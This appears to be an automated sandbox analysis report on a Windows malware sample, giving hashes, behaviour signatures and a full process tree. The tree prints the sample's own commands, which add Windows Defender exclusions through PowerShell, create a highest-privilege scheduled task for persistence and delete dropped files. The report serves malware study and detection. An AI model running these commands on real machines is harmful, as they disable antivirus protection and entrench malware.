Analysis
-
max time kernel
128s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
03/11/2024, 05:00
Static task
static1
Behavioral task
behavioral1
Sample
89bf9535900487968f2c9282bc739f78_JaffaCakes118.exe
Resource
win7-20241010-en
General
-
Target
89bf9535900487968f2c9282bc739f78_JaffaCakes118.exe
-
Size
1.9MB
-
MD5
89bf9535900487968f2c9282bc739f78
-
SHA1
1640394a37b36fb937e743599932155a32a9f737
-
SHA256
5f87e339571e6fad52ee59bb9f47bcea7a929187153fe73e2c6bf6f686c346be
-
SHA512
48c5dfe6c34dd81a9c987030264255dccbcfc895bd5b80a2dfde94b68be0721787e2fec3ceef857f2951b4c37ac20c8b6e0a92bc57aaf8ee550be3ceaf662472
-
SSDEEP
49152:J4fnmf79D0vIST10ybAe/BSWpU1cQX0uDHD8bPiz8Em:JamfOR82pnC9ffY5
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2812 powershell.exe 2604 powershell.exe 2952 powershell.exe 936 powershell.exe 2440 powershell.exe 872 powershell.exe 2300 powershell.exe 3040 powershell.exe 2256 powershell.exe 1056 powershell.exe -
Executes dropped EXE 5 IoCs
pid Process 2324 mbuilder.exe 1508 svchost32.exe 2508 mbuilder.exe 1284 svchost32.exe 1740 sihost32.exe -
Loads dropped DLL 4 IoCs
pid Process 1460 cmd.exe 1508 svchost32.exe 2428 cmd.exe 1284 svchost32.exe -
Drops file in System32 directory 7 IoCs
description ioc Process File created C:\Windows\system32\mbuilder.exe svchost32.exe File opened for modification C:\Windows\system32\mbuilder.exe svchost32.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Windows\system32\Microsoft\Telemetry\sihost32.exe svchost32.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\mbuilder.exe 89bf9535900487968f2c9282bc739f78_JaffaCakes118.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 89bf9535900487968f2c9282bc739f78_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1924 schtasks.exe 1976 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 2300 powershell.exe 2812 powershell.exe 3040 powershell.exe 2604 powershell.exe 2256 powershell.exe 2952 powershell.exe 1508 svchost32.exe 1056 powershell.exe 936 powershell.exe 2440 powershell.exe 872 powershell.exe 1284 svchost32.exe -
Suspicious use of AdjustPrivilegeToken 12 IoCs
description pid Process Token: SeDebugPrivilege 2300 powershell.exe Token: SeDebugPrivilege 2812 powershell.exe Token: SeDebugPrivilege 3040 powershell.exe Token: SeDebugPrivilege 2604 powershell.exe Token: SeDebugPrivilege 2256 powershell.exe Token: SeDebugPrivilege 2952 powershell.exe Token: SeDebugPrivilege 1508 svchost32.exe Token: SeDebugPrivilege 1056 powershell.exe Token: SeDebugPrivilege 936 powershell.exe Token: SeDebugPrivilege 2440 powershell.exe Token: SeDebugPrivilege 872 powershell.exe Token: SeDebugPrivilege 1284 svchost32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2024 wrote to memory of 1968 2024 89bf9535900487968f2c9282bc739f78_JaffaCakes118.exe 31 PID 2024 wrote to memory of 1968 2024 89bf9535900487968f2c9282bc739f78_JaffaCakes118.exe 31 PID 2024 wrote to memory of 1968 2024 89bf9535900487968f2c9282bc739f78_JaffaCakes118.exe 31 PID 2024 wrote to memory of 1968 2024 89bf9535900487968f2c9282bc739f78_JaffaCakes118.exe 31 PID 2024 wrote to memory of 1724 2024 89bf9535900487968f2c9282bc739f78_JaffaCakes118.exe 33 PID 2024 wrote to memory of 1724 2024 89bf9535900487968f2c9282bc739f78_JaffaCakes118.exe 33 PID 2024 wrote to memory of 1724 2024 89bf9535900487968f2c9282bc739f78_JaffaCakes118.exe 33 PID 2024 wrote to memory of 1724 2024 89bf9535900487968f2c9282bc739f78_JaffaCakes118.exe 33 PID 1724 wrote to memory of 2324 1724 cmd.exe 36 PID 1724 wrote to memory of 2324 1724 cmd.exe 36 PID 1724 wrote to memory of 2324 1724 cmd.exe 36 PID 1724 wrote to memory of 2324 1724 cmd.exe 36 PID 1968 wrote to memory of 2300 1968 cmd.exe 35 PID 1968 wrote to memory of 2300 1968 cmd.exe 35 PID 1968 wrote to memory of 2300 1968 cmd.exe 35 PID 1968 wrote to memory of 2300 1968 cmd.exe 35 PID 2324 wrote to memory of 2740 2324 mbuilder.exe 37 PID 2324 wrote to memory of 2740 2324 mbuilder.exe 37 PID 2324 wrote to memory of 2740 2324 mbuilder.exe 37 PID 2740 wrote to memory of 2812 2740 cmd.exe 39 PID 2740 wrote to memory of 2812 2740 cmd.exe 39 PID 2740 wrote to memory of 2812 2740 cmd.exe 39 PID 2740 wrote to memory of 3040 2740 cmd.exe 40 PID 2740 wrote to memory of 3040 2740 cmd.exe 40 PID 2740 wrote to memory of 3040 2740 cmd.exe 40 PID 2740 wrote to memory of 2604 2740 cmd.exe 41 PID 2740 wrote to memory of 2604 2740 cmd.exe 41 PID 2740 wrote to memory of 2604 2740 cmd.exe 41 PID 1968 wrote to memory of 2256 1968 cmd.exe 42 PID 1968 wrote to memory of 2256 1968 cmd.exe 42 PID 1968 wrote to memory of 2256 1968 cmd.exe 42 PID 1968 wrote to memory of 2256 1968 cmd.exe 42 PID 2740 wrote to memory of 2952 2740 cmd.exe 43 PID 2740 wrote to memory of 2952 2740 cmd.exe 43 PID 2740 wrote to memory of 2952 2740 cmd.exe 43 PID 2324 wrote to memory of 1460 2324 mbuilder.exe 44 PID 2324 wrote to memory of 1460 2324 mbuilder.exe 44 PID 2324 wrote to memory of 1460 2324 mbuilder.exe 44 PID 1460 wrote to memory of 1508 1460 cmd.exe 46 PID 1460 wrote to memory of 1508 1460 cmd.exe 46 PID 1460 wrote to memory of 1508 1460 cmd.exe 46 PID 1508 wrote to memory of 2064 1508 svchost32.exe 47 PID 1508 wrote to memory of 2064 1508 svchost32.exe 47 PID 1508 wrote to memory of 2064 1508 svchost32.exe 47 PID 2064 wrote to memory of 1924 2064 cmd.exe 49 PID 2064 wrote to memory of 1924 2064 cmd.exe 49 PID 2064 wrote to memory of 1924 2064 cmd.exe 49 PID 1508 wrote to memory of 2508 1508 svchost32.exe 50 PID 1508 wrote to memory of 2508 1508 svchost32.exe 50 PID 1508 wrote to memory of 2508 1508 svchost32.exe 50 PID 1508 wrote to memory of 1652 1508 svchost32.exe 51 PID 1508 wrote to memory of 1652 1508 svchost32.exe 51 PID 1508 wrote to memory of 1652 1508 svchost32.exe 51 PID 2508 wrote to memory of 2000 2508 mbuilder.exe 52 PID 2508 wrote to memory of 2000 2508 mbuilder.exe 52 PID 2508 wrote to memory of 2000 2508 mbuilder.exe 52 PID 2000 wrote to memory of 1056 2000 cmd.exe 55 PID 2000 wrote to memory of 1056 2000 cmd.exe 55 PID 2000 wrote to memory of 1056 2000 cmd.exe 55 PID 1652 wrote to memory of 2204 1652 cmd.exe 56 PID 1652 wrote to memory of 2204 1652 cmd.exe 56 PID 1652 wrote to memory of 2204 1652 cmd.exe 56 PID 2000 wrote to memory of 936 2000 cmd.exe 57 PID 2000 wrote to memory of 936 2000 cmd.exe 57 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\89bf9535900487968f2c9282bc739f78_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\89bf9535900487968f2c9282bc739f78_JaffaCakes118.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2024 -
C:\Windows\SysWOW64\cmd.execmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1968 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2300
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2256
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c start C:\Windows\mbuilder.exe2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1724 -
C:\Windows\mbuilder.exeC:\Windows\mbuilder.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2324 -
C:\Windows\system32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit4⤵
- Suspicious use of WriteProcessMemory
PID:2740 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2812
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3040
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2604
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2952
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\mbuilder.exe"4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1460 -
C:\Users\Admin\AppData\Local\Temp\svchost32.exeC:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\mbuilder.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1508 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "mbuilder" /tr '"C:\Windows\system32\mbuilder.exe"' & exit6⤵
- Suspicious use of WriteProcessMemory
PID:2064 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "mbuilder" /tr '"C:\Windows\system32\mbuilder.exe"'7⤵
- Scheduled Task/Job: Scheduled Task
PID:1924
-
-
-
C:\Windows\system32\mbuilder.exe"C:\Windows\system32\mbuilder.exe"6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2508 -
C:\Windows\system32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit7⤵
- Suspicious use of WriteProcessMemory
PID:2000 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'8⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1056
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'8⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:936
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'8⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2440
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'8⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\mbuilder.exe"7⤵
- Loads dropped DLL
PID:2428 -
C:\Users\Admin\AppData\Local\Temp\svchost32.exeC:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\mbuilder.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1284 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "mbuilder" /tr '"C:\Windows\system32\mbuilder.exe"' & exit9⤵PID:2088
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "mbuilder" /tr '"C:\Windows\system32\mbuilder.exe"'10⤵
- Scheduled Task/Job: Scheduled Task
PID:1976
-
-
-
C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"9⤵
- Executes dropped EXE
PID:1740
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"9⤵PID:2800
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 310⤵PID:3036
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"6⤵
- Suspicious use of WriteProcessMemory
PID:1652 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 37⤵PID:2204
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4FIMNYIQ5MCYM0VI3FL6.temp
Filesize7KB
MD5f8356ac9a42cb4d9953ab60a51da8067
SHA17cf5b6912b66d1bdbfb1f1f0e2c3c17b7820b337
SHA2562e85095b15e6f9876c5ef74bb9581df7ff372fb671ff4fa219a2bbc25fdf7ef0
SHA512abd88d00b9b5c749bbeed0cd8e6e4900d73dcd42a5a133e6bf12fd856f68de7d53446be57ec82b5249b51d55b2dc3ec4b04cd1d3e08b9bdb77b278be005241a6
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD52ecd7461cdcd8f331d90b44e9854faf2
SHA1d714f3038e051503c9ad6915cc28c2304617dda8
SHA25663ff90cbf00b00721be8bc808c796de2635d90f391ddf5882ee68eecc52eac6f
SHA512dc3de7568b7a484141254745b5dc63b2d6207f1a1e8c3d7a1a100b462f83f1dd0a9f83d4686797ac8e4ca0f29aa210db697af8cd4e264ffc9e3d16ae15d24ae8
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5f2d36cd608bb92d0096c59ee8ce8345e
SHA1f0f0a158c540718f74791512b565287968a61f6a
SHA256db51255e061e2e55ad9b57a88a88a61a1bfa6bfb3a8796f51b48e5c35a5175fb
SHA51284de23a4085125d00493cfbb0d94d4e2ce0153049c7bf0176bcc69f7fe4becb834c7d75e1c997a5690a3ca2a99c82c5607168095773ff557d82fbbad65f7ac21
-
Filesize
1.9MB
MD50febccd878b78d6a42ea449dd2f8bca9
SHA17edd6245882138e3b5211ff9ea98d59e3cf5371a
SHA256a9add30083b1b937144f9933e673062067566df458c605d9b4c817b848325e11
SHA51200949836978dcf133db10e1d04c4513b97eb69d651e781eb91ec1b4b2533cdd1fa7fff39f53bc46bd888b53e55607531c3f50ac1024c182ecc313cf29fcf1523
-
Filesize
8KB
MD5ecd7d7be630be740725bb52e73dafec0
SHA17def3f5a97ffbd07ad81357262b0c0b49859276d
SHA25676b4687442dd515b5e7399abb4a4f603b0634c37ff6b47ed51efae68e0d71706
SHA512412d282c9018c909ea15f6aa2f1651eb4f46ed332b6084f17b58ada74b685a1d357cc71debed5b027973e84760cb6f2d7acd0e759e5850f7c261af472b3bab45
-
Filesize
1.9MB
MD50a36dbea88311baeb376ff6fb3ea0a3a
SHA1100d0b18060351080e63c3e920017056bc6ad9ee
SHA256a3d218dbf74614c2beacec478f3d04160e2757022303a105c6a7fe25d044ff6b
SHA512ad329ddc01dfd4137964aab22de4471f687e44fe2bce98e1efce04f70074d38ba650d59b33fa8430035c54be401f4f751ea94b5ef0ccf60e6b0eb24d816087d8